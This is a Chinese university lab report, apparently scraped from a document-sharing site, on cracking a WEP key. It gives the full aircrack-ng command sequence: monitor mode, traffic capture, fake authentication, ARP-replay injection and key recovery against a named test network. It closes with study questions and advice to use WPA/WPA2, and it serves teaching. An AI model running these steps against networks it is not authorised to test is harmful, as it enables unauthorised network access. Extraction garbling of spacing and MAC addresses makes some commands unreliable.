WEP网络秘钥破解.docx
- 文档编号:7953952
- 上传时间:2023-01-27
- 格式:DOCX
- 页数:10
- 大小:1.24MB
WEP网络秘钥破解.docx
《WEP网络秘钥破解.docx》由会员分享,可在线阅读,更多相关《WEP网络秘钥破解.docx(10页珍藏版)》请在冰豆网上搜索。
WEP网络秘钥破解
《无线网络》课程试验报告
实验任务书
1.内容
WEP网络秘钥破解。
2.目的
演示WEP协议的漏洞,对WEP网络的脆弱性有直观认识,并具备一定的动手破解能力。
3.试验要求
个人单独完成实验内容,并记录遇到的问题以及解决方法。
4.报告要求
对每一步的操作截图佐证,并回答指导书上的相应问题。
实验过程及其分析
(1)把网卡设置成监听模式并设置到相应频道
首先使用iwconfig查看本机网卡的信息
然后关闭网卡,设置网卡模式,打开网卡,所用命令及显示如下
对比上下两张图,wlan0的mode由managed变成了monitor说明模式设置成功。
(2)使用airmon-ng开始监听
装载监听网卡,命令及结果如下
开启监听后,使用iwconfig确认下监听网卡是否装载成功,装载成功将多出一个mon0网卡,如下图:
(3)探测网络,收集流量
使用命令airodump-ngmon0
●“mon0”为在iwconfig中看到的监听网卡的名字
使用的结果如下(要等一段时间)
从这个图中我们可以找到我们的目标:
WEP加密的cly111网络。
记录下该网络的信息,供下一步使用。
(4)测试注包功能
所用命令
aireplay-ng-9–ecly111–a00:
22:
3F:
41:
3A:
74mon0
其中:
●aireplay-ng:
命令名
●-9:
表示注入测试
●-ecly111:
表示指定无线网络名称为dd-wrt
●-a00:
22:
3F:
41:
3A:
74:
指定无线接入点的物理地址为00:
22:
3F:
41:
3A:
74
●mon0:
指定使用的无线网卡的名字
命令运行成功应该出现如下显示:
测试成功后,进入下一步。
(5)抓取流量
命令
airodump-ng--ivs-c5--bssid00:
22:
3F:
41:
3A:
74-wcly_filemon0
●airodump-ng:
命令名
●-ivs:
只记录iv
●-c5:
指定频道5
●--bssid00:
22:
3F:
41:
3A:
74:
指定无线接入点的物理地址,过滤掉其他无关信息
●-wcly_file:
抓取信息保存文件的前缀
●mon0:
指定用来抓取信息的网卡
命令运行时显示类似于下图:
将运行该敏力的窗口保留,打开另一个终端,进行下面的实验。
(6)伪装认证
伪装认证命令:
aireplay-ng-10-ecly111-a00:
22:
3F:
41:
3A:
74-h40:
16:
9F:
8A:
B1:
28mon0
其中
●-1:
表示认证伪装
●0:
表示重连间隔
●-ecly111:
指定无线网络的名字(ESSID)
●-a00:
22:
3F:
41:
3A:
74:
指定接入点的物理地址(MAC地址,BSSID)
●-h40:
16:
9F:
8A:
B1:
28:
指定自己的网卡的物理地址(MAC地址)
命令成功显示如下:
认证成功后,将在上一步保留的窗口中看到自己网卡的物理地址。
此外,如果同时有某个人在做ARP攻击的话,认证可能失败,因为ARP攻击中有非常多的数据包发送给接入点,接入点太忙而不能回复你的认证请求。
在这样的情况下,等一两分钟再进行伪装认证。
(7)注包产生流量
注包命令:
aireplay-ng-3-b00:
22:
3F:
41:
3A:
74-h40:
16:
9F:
8A:
B1:
28mon0
●-3:
代表标准ARP请求与回复
●-b00:
22:
3F:
41:
3A:
74:
指定接入点的物理地址(BSSID)
●-h40:
16:
9F:
8A:
B1:
28:
指定自己网卡的物理地址
●mon0:
表示自己无线网卡的名字
命令成功运行后,显示如下:
看到ARP请求的数目增加很快是很重要的。
但是也有可能一个ARP请求数据包都捕捉不到,这发生在网络是空闲(没有活动)的时候。
如果没有得到ARP注入,需要等几分钟。
在收集到足够多的iv后,进入下一步
(8)破解秘钥
命令:
PTW:
aircrack-ng-z-b00:
22:
3F:
41:
3A:
74cly_file*.ivs
FMS/Korek
aircrack-ng-K-b00:
22:
3F:
41:
3A:
74cly_file*.ivs
aircrack-ng-b00:
22:
3F:
41:
3A:
74cly_file*.ivs
思考题
(1)为什么要伪装认证?
答:
伪装认证后才可以欺骗路由器与其通信,进行下一步的注包攻击以获得大量的IV。
(2)为什么要产生流量?
答:
只有产生了流量,才能获得大量的ARP恢复,通过这些信息才能破解秘钥。
(3)除了本实验的方法,是否还有其他方法产生流量?
答:
还可以在网上下载东西或者ping路由器。
(4)在完成本实验后,对保护无线网络的安全有什么想法。
答:
通过本次实验,我发现破解WEP加密的秘钥还是非常容易破解的,所以为了保护自己的无线网络安全,可以采用WPA或WPA2的加密方式,还可以隐藏SSID广播或者使用MAC地址过滤。
(5)后续攻击的方法与思路。
同组人员:
于龙飞、陈俊任、吕佳宪
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- WEP 网络 破解